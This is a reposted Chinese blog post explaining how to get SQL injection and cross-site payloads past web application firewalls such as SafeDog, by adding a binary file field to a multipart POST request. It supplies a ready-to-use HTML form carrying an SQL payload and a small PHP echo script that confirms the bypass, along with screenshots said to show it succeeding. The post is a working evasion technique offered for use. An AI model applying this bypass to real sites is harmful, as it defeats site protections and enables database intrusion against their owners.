码迷,mamicode.com
首页 > 其他好文 > 详细

轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

时间:2014-08-01 15:41:51      阅读:203      评论:0      收藏:0      [点我收藏+]

标签:style   http   color   os   io   文件   for   2014   

XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。

构建如下HTML表单:

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>yzmm - p2j.cn</title>
</head>
<body>
<form action="http://webshell.cc/index.php" method="POST" enctype="multipart/form-data">
File:<input type="file" name="file" /><br/>
ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/>
<input type="submit" value="提交" />
</form>
</body>
</html>

index.php:

 

<?php
echo "POST-ID:".$_POST[‘id‘]."<br/>GET-ID:".$_GET[‘id‘];
?>

bubuko.com,布布扣

提交带二进制文件的请求:

bubuko.com,布布扣

成功绕过。

 

 

本站内容均为原创,转载请务必保留署名与链接!
轻松绕各种WAF的POST注入、跨站防御(比如安全狗):http://www.webshell.cc/4464.html

轻松绕各种WAF的POST注入、跨站防御(比如安全狗),布布扣,bubuko.com

轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

标签:style   http   color   os   io   文件   for   2014   

原文地址:http://www.cnblogs.com/develop/p/3884872.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!